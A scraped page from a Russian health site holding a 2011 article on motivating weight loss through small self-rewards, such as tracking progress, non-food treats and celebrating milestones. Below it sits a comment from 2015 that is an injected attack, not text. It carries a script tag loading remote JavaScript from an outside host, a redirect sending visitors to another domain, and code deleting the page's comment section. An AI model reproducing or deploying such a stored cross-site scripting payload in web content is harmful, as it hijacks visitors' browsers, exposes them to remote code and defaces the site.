Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лишний вес: маленькие наг...  >>  Лишний вес: маленькие награды за большие достижения
 
Обратная связь
 

Лишний вес: маленькие награды за большие достижения

Размер шрифта
21 июня 2011 06:31
  • google_analytics: false
  • Нравится

Каждому из нас время от времени нужна поддержка. И лучше всего мы ее воспринимаем в тот момент, когда напряжены, когда хотим во что бы то ни стало сделать еще один шаг вперед, и когда переживаем, что ничего не получится. 

 

Екатерина Олейникова / Здоровье инфо

Многие люди воспринимают здоровый образ жизни как нечто, связанное с дискомфортом, неприятными ощущениями. Они постоянно понукают себя, ругают за собственные слабости, не обращая внимания на крохотные, но все же победы.

Чувство вины, сомнение, стыд – вот чем пользуются такие люди, и вместо того, чтобы радоваться исчезнувшим 500 граммам, ругают себя за те 10 кило, которые еще надо сбросить. Узнаете себя? И уверены, что других способов мотивировать себя на похудение больше нет? А вы представьте себя в роли начальника. Долго ли с вами проработал бы ваш подчиненный, если бы вы постоянно вменяли ему то одну оплошность, то другую и не хвалили бы никогда? Да он сбежал бы от вас через месяц!

Есть другой путь. Не ругайте себя, посмотрите на ситуацию с другой точки зрения, найдите возможность похвалить себя за любое, пусть и никому не заметное достижение. Никто не спорит, что откровенные слова и грубая честность подчас заставляют пошевеливаться. Однако позитивное мышление также способно спасти вас от эмоционального выгорания. Доброе слово, адресованное самому себе, творит чудеса.

Итак, строим систему самопоощрения.

  • Отмечайте свои успехи. Рисуйте кривую снижения собственного веса, делайте замеры каждый день, следите за прогрессом, ибо все это  –  медленное, но верное движение к цели.
  • Не надо откармливаться в качестве вознаграждения. Пусть даже это еда в дорогом ресторане. Слишком сомнительная награда.
  • Каждый ваш маленький успех должен стать вехой. А значит, похвала должна буть существенной: купите себе пару дорогих туфель за отвоеванные у жира 300 граммов или устройте длинный выходной и слетайте на выходные в Европу.

  • Планируйте свои будущие успехи: отличное здоровье, стройная фигура, здоровая диета. В подробностях расписывайте себе, как именно вы себя за них наградите. Обязательно расскажите о планах друзьям, пусть они станут либо близкими наблюдателями, либо непосредственными участниками.
  • Не обманывайте себя. Не подделывайте подсчеты, не натягивайте сантиметр, не забегайте вперед. Помните: выработка привычки – процесс длительный, и награда все-таки ждет вас в самом конце.
  • Постоянно говорите себе комплименты. Представьте, что вам надо похвалить другого человека за некое достижение, запишите эти фразы и повторяйте их, глядя в зеркало.
  • Назначьте день отдыха от каких бы то ни было целей.
  • Заведите копилку и опускайте туда 100 рублей каждый раз, когда делаете еще один маленький шаг вперед. Когда наберете тысячу, сделайте себе подарок (разумеется, размер взносов в копилку и сумму выигрыша устанавливаете для себя только вы).
  • Купите маленький блокнотик, носите его везде и записывайте все победы. Кстати, заодно, там же можно вести учет калорий, соли и жира. Очень удобно.
  • Когда сильно захочется есть, сходите в кино. Но только попкорн там не покупайте.
  • Если вас приглашают на банкет, откажитесь и наградите за отказ походом в спа-салон или сеанс массажа.
  • Купите подарочный сертификат и пользуйтесь им каждый раз, когда кривая на вашем графике стремится вниз.
  • Если фантазия уже иссякает, а килограммов впереди еще много, пускайтесь во все тяжкие –  заказывайте лимузин и катайтесь по городу, хоть одна, хоть с тем, кто вам очень дорог.
  • Исполняйте желания: подпишитесь на журнал, который всегда хотели иметь под рукой.
  • Празднуйте круглые даты. Сто дней без пирожных. Или: месяц утренних пробежек. Еще лучше: первые десять килограммов долой. Список праздничных мероприятий по этому поводу опять же перед вами.
  • Ну, а если этот список вам известен, то вы проделали долгий путь и наверняка растеряли все свои лишние килограммы. Чем не повод для очередного праздника? Вперед, в парк, на природу, запускать воздушного змея!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Пищевая пирамида   8 способов не располнеть в менопаузе   Как меняется аппетит с возрастом   Радикальные методы снижения веса  
26 июля 2011Диеты помогают только молодым 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Как похудеть суперзанятым женщинам?
Супереда для быстрого похудения
Диеты, подтвержденные наукой. Диета от давления

Тесты

1
Готовы ли вы сбросить лишнее?
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.